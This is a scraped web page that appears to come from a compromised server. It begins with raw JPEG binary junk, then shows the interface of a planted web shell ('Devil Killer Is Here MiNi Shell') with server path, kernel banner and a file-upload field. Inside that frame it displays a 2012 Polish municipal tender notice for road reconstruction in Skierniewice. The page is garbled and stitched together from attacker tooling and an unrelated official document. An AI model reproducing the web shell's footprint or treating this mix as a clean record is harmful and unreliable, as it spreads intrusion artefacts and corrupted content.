JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120228/46967-N-2012.html

<p class="kh_header"><b>Skierniewice: Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy Iwaszkiewicza, oraz przebudowa ulicy Moniuszki</b><br>
<b>Numer ogłoszenia: 46967 - 2012; data zamieszczenia: 28.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy Iwaszkiewicza, oraz przebudowa ulicy Moniuszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy Iwaszkiewicza, oraz przebudowa ulicy Moniuszki, zgodnie z przedmiarami robót stanowiącymi załączniki do niniejszej SIWZ. 

Zamówienie obejmuje wykonanie inwestycji drogowych zawierających zadania:
1. Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy Iwaszkiewicza.
2. Przebudowa ulicy Moniuszki.

Orientacyjny zakres inwestycji pn.: Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy Iwaszkiewicza
             a) długość projektowanego odcinka ulicy wynosi ok.326 m,
      b) zakres robót obejmuje:
-	roboty rozbiórkowe istniejących nawierzchni i elementów drogowych (nawierzchni,            podbudów, krawężników, obrzeży itp.),
-	roboty ziemne,
-	wykonanie podbudowy i nawierzchni: jezdni ulicy, zatok parkingowych, chodników, wysp dzielących itp.,   
-	przebudowa skrzyżowania ulic na skrzyżowanie typu rondo,
-	wykonanie oznakowania pionowego i poziomego,
-	przebudowa wodociągu dł. ok. 36 m,
-	wykonanie kanalizacji deszczowej dł. ok. 170 m, z przykanalikami i wpustami, 
-	przebudowa oświetlenia ulicznego i linii elektroenergetycznej doziemnej-dł.ok. 125 m.

Zamawiający zastrzega, że kanalizacja deszczowa w ulicy Iwaszkiewicza powinna być wykonana przed przebudową wodociągu.

Orientacyjny zakres inwestycji pn.: Przebudowa ulicy Moniuszki 
             a) długość projektowanego odcinka ulicy wynosi ok.222 m,
      b) zakres robót obejmuje:
-	roboty rozbiórkowe istniejących nawierzchni i elementów drogowych (nawierzchni, podbudów, krawężników, obrzeży itp.),
-	ścinanie drzew i krzewów, 
-	roboty ziemne,
-	wykonanie podbudowy i nawierzchni jezdni ulicy, chodników,    
-	wykonanie oznakowania pionowego i poziomego,
-	wykonanie kanalizacji deszczowej dł. ok. 230 m, z przykanalikami i wpustami.
Zamawiający informuje, że dokumentacja projektowa obejmuje wykonanie robót budowlanych w ulicach: Willowej, Wieniawskiego i Moniuszki. Roboty budowlane w ulicach Willowej i Wieniawskiego zostały wykonane wcześniej, natomiast przedmiot zamówienia jest określony szczegółowo przez przedmiar robót i wykaz cen.

Wykonawca zobowiązany jest udzielić co najmniej 48 miesięcznej gwarancji na wykonane  roboty budowlane.

Szczegółowy opis zamówienia został zawarty w dokumentacjach projektowych na wykonanie zadania oraz w Specyfikacjach Technicznych, które są dostępne w Wydziale Dróg i Komunikacji Urzędu Miasta Skierniewice przy ul. Floriana 9 w pokoju nr 12  oraz na stronie internetowej BIP UM Skierniewice.
Uwaga!
Tam, gdzie w opracowaniu zostały wskazane normy, aprobaty, specyfikacje   i systemy,  o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie rozwiązań RÓWNOWAŻNYCH. Wykonawca, który powołuje się na rozwiązania równoważne opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane dostawy, spełniają wymagania określone przez Zamawiającego. 
Dopuszcza się innych producentów materiałów budowlanych, niż podani w opracowaniu, pod warunkiem zagwarantowania RÓWNORZĘDNYCH parametrów technicznych i technologicznych oraz zgodności z obowiązującymi wymaganiami prawnymi oraz w porozumieniu z projektantem.

Podział zamówienia na części
Zamówienie dzieli się na następujące części stanowiące odrębne zadania inwestycyjne:

a) Część I - Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy  Iwaszkiewicza.

b) Część II - Przebudowa ulicy Moniuszki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających zgodnie z art. 67, ust. 1, pkt 6 Ustawy. Zamówienia uzupełniające stanowić mogą nie więcej niż 50% wartości zamówienia podstawowego i polegać będą na powtórzeniu zamówienia takiego samego rodzaju.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.11.13.00-1, 45.11.20.00-5, 45.11.10.00-8, 45.23.00.00-8, 45.23.11.10-9, 45.23.31.24-4, 45.23.33.20-8, 45.23.32.20-7, 45.23.13.00-8, 45.23.32.90-8, 45.23.32.21-4, 45.23.14.00-9, 45.31.53.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium.
1.	 Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości:
a) w przypadku składania oferty na część I zadania wg pkt. 4 SIWZ - w wysokości 18 000,00 zł (osiemnaście tysięcy złotych),
b) w przypadku składania oferty na część II zadania wg pkt. 4 SIWZ - w wysokości 14 000,00 zł (czternaście tysięcy złotych).
2.	Wadium powinno być wniesione przed upływem terminu składania ofert.
3.	Wadium może być wniesione w formach przewidzianych w art. 45. ust. 6. Ustawy.
4.	Wadium w pieniądzu należy wpłacić na rachunek bankowy o nr konta: 
KREDYT BANK S.A. oddział w Skierniewicach nr 42 1500 1689 1216 8004 0851 0000 z dopiskiem: 
a) w przypadku złożenia oferty na część I zadania: DK - wadium do przetargu pn.:  
  Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy Iwaszkiewicza, oraz    przebudowa ulicy Moniuszki - część I,
b) w przypadku złożenia oferty na część II zadania: DK - wadium do przetargu pn.:      Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy Iwaszkiewicza, oraz     przebudowa ulicy Moniuszki - część II.
5.	 Zamawiający będzie przechowywał wadium wniesione w pieniądzu na rachunku bankowym i jego zwrot nastąpi zgodnie z art. 46, ust. 4 ustawy.
6.	Wadium w innych dopuszczonych formach należy wnieść w kasie Urzędu Miasta Skierniewice.
7.	Zwrot wadium nastąpi w przypadkach i na warunkach przewidzianych w art. 46 Ustawy.
8.	Zamawiający zatrzyma wadium wraz z odsetkami w przypadkach przewidzianych w art. 46, ust. 4a i 5 ustawy
9.	Wadium należy wnieść na okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1. Spełniają warunki określone w art. 22, ust. 1 pkt. 1-4 ustawy Pzp, oraz wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp oraz dostarczą oświadczenia i dokumenty wymagane przez Zamawiającego.
Ocena spełniania warunku wymaganego od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust. 1 pkt. 2 ustawy Pzp, dotyczący posiadania wiedzy i doświadczenia za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej dwie roboty budowlane o wartości minimum 800 000,00 zł (osiemset tysięcy złotych) brutto każda, podobne z rodzaju do przedmiotu zamówienia. Warunek ten dotyczy przypadków składania oferty: na zadanie stanowiące część I zamówienia lub na zadanie stanowiące część II zamówienia lub na zadania stanowiące część I i część II zamówienia. Wykonawca winien załączyc do oferty wykaz co najmniej dwóch robót budowlanych w zakresie niezbędnym do wykazania spełnienia 
            warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem   terminu składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  podobnych z rodzaju do przedmiotu zamówienia, o wartości co najmniej 800 000,00 zł (osiemset    tysięcy złotych) brutto każda, podobnych z rodzaju do przedmiotu zamówienia.
Wykaz należy sporządzić wg załącznika nr 6.
Do oferty należy załączyć również dokumenty potwierdzające, że roboty wymienione powyżej zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo zakończone.
Na dowód tego Wykonawca winien załączyć do oferty oświadczenie -załącznik nr 3 do SIWZ oraz dokumenty wymagane w SIWZ. 
Ocena spełniania warunku wymaganego od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że powyższy warunek zostanie spełniony przez Wykonawcę, który dysponuje odpowiednim potencjałem technicznym, za spełnienie tego warunku zamawiajacy uzna złożenie Oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodne z treścią załącznika nr 3. 
Ocena spełniania warunku wymaganego od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że powyższy warunek zostanie spełniony przez Wykonawcę który dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi odpowiednie doświadczenie, kwalifikacje i uprawnienia. Na dowód tego Wykonawca winien złożyć oświadczenie wg. załącznika nr 3. Ocena spełniania warunku wymaganego od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust. 1 pkt. 4 ustawy Pzp, dotyczący sytuacji ekonomicznej i finansowej za spełniony, jeżeli wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum:
- w przypadku składania oferty tylko na zadanie stanowiące część I zamówienia - 1 200 000,00 zł (jeden milion dwieście tysięcy złotych)
- w przypadku składania oferty tylko na zadanie stanowiące część II zamówienia - 900 000,00 zł (dziewięćset tysięcy złotych).
- w przypadku składania oferty na zadanie stanowiące część I i część II zamówienia - 2 100 000,00 zł (dwa miliony sto tysięcy złotych).      

W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia - opłacona polisa, a w  przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie wykonywanej działalności gospodarczej na kwotę 
           minimum:
     a) w przypadku składania oferty tylko na zadanie stanowiące część I zamówienia - 1 200 000,00 zł (jeden milion dwieście tysięcy złotych)
     b) w przypadku składania oferty tylko na zadanie stanowiące część II zamówienia - 900 000,00 zł (dziewięćset tysięcy złotych) ,        
           c) w przypadku składania oferty na zadanie stanowiące część I i część II zamówienia -  2 100 000,00 zł (dwa miliony sto tysięcy złotych).       
Ocena spełniania warunku wymaganego od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oferta wykonawcy - wg wzoru stanowiącego załącznik nr 2 do SIWZ.
2.	Wykaz Cen -  sporządzony wg załącznika 2.1. i 2.2. do SIWZ 
a)	Wykonawcy winni oddzielnie wycenić każdą pozycję w Wykazie Cen (CW) (załącznik nr 2.1. i 2.2. do SIWZ), przestrzegając zasad dotyczących wyliczenia wartości w każdej pozycji oraz podsumowania kwot ogólnych podanych w CW. Wykonawcy nie wolno zmieniać ilości podanych w CW,
b)	CW należy odczytywać łącznie z innymi dokumentami kontraktowymi. Przyjmuje się, iż Wykonawca dokładnie zapoznał się ze szczegółowym opisem robót, jakie mają zostać wykonane i sposobem ich wykonania. Całość robót winna być wykonana zgodnie z zamierzeniem i przeznaczeniem przedmiotu zamówienia,
c)	ilości podane w każdej pozycji wykazu są wielkościami informacyjnymi, wskazującymi jedynie orientacyjny zakres prac, które powinny być wykonane dla skompletowania danego elementu (roboty), za którą przysługuje wyliczone dalej wynagrodzenie ryczałtowe i nie mają znaczenia przy rozliczaniu wartości danego elementu (roboty) po jego wykonaniu,
d)	niezależnie od wymienionego poprzednio przeznaczenia, ilości w CW zostały podane dla stworzenia wspólnych i porównywalnych wycen na potrzeby przetargu,
e)	krótkie opisy pozycji przedstawione w CW są podane tylko dla celów identyfikacyjnych i w żaden sposób nie modyfikują czy anulują szczegółowych opisów zawartych w specyfikacjach technicznych i projektach.
3.	Potwierdzenie wniesienia wadium - wymagania dotyczące wadium zawarte zostały w pkt. 11 niniejszej SIWZ. 
4.	Oświadczenie o spełnianiu warunków udziału w postępowaniu zawartych w art. 22, ust. 1 Ustawy - wg wzoru stanowiącego załącznik nr 3 do SIWZ 
5.	Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy - wg wzoru stanowiącego załącznik nr 5 do SIWZ,
6. Informację dotyczącą zakresu robót, który wykonawca zamierza powierzyć podwykonawcom - wg zał. 4. Jeśli wykonawca nie będzie korzystał z podwykonawców wówczas w załączniku nr 4 wpisuje Nie Dotyczy.
7. Wykaz co najmniej dwóch robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem  terminu składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
podobnych z rodzaju do przedmiotu zamówienia, o wartości co najmniej 800 000,00 zł (osiemset  tysięcy złotych) brutto każda, podobnych z rodzaju do przedmiotu zamówienia. Wykaz należy sporządzić wg załącznika nr 6.
8. Dokumenty potwierdzające, że roboty wymienione powyżej zostały wykonane zgodnie z  zasadami sztuki budowlanej i prawidłowo zakończone.
9. Pełnomocnictwo (gdy jest wymagane).
10. W przypadku wykonawców występujących wspólnie na podstawie art. 23 ustawy do oferty należy  dołączyć dokumenty:  
            a) pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego,  o którym mowa w art. 23 ustawy,                                                                                                                
            b) dokumenty wymienione w punktach od 15.5 do 15.8 muszą być złożone przez każdy podmiot,
a)	pozostałe dokumenty wymienione w pkt. 15 podmioty składają wspólnie jako konsorcjum,
b)	w przypadku ofert składanych wspólnie warunki zawarte w pkt. 15 muszą być spełnione  wspólnie lub przynajmniej przez jeden podmiot, o ile zamawiający nie zastrzegł inaczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w zakresie: przedłużenia terminu realizacji, terminów płatności. Zamawiający może wyrazić zgodę na zmianę postanowień umowy pod warunkiem, że zmiany te nie będą niekorzystne dla Zamawiającego lub (w przypadku zmiany terminu realizacji zadania) wynikać będą z okoliczności nieprzewidzianych i niezawinionych przez Wykonawcę (warunki pogodowe, odmienne od przyjętych w dokumentacji warunki terenowe, zwłoka lub odmowa w wydawaniu pozwoleń i uzgodnień przez odpowiednie urzędy, konieczność usunięcia błędów w dokumentacji projektowej). Zmiana postanowień umowy może być dokonana tylko poprzez zawarcie pisemnego aneksu pomiędzy stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Skierniewice
ul. Rynek 1
96-100 Skierniewice
Wydział Dróg i Komunikacji pokój nr 12 (wejście od Pl. Św. Floriana)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2012 godzina 11:30, miejsce: Urząd Miasta Skierniewice
ul. Rynek 1
96-100 Skierniewice
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





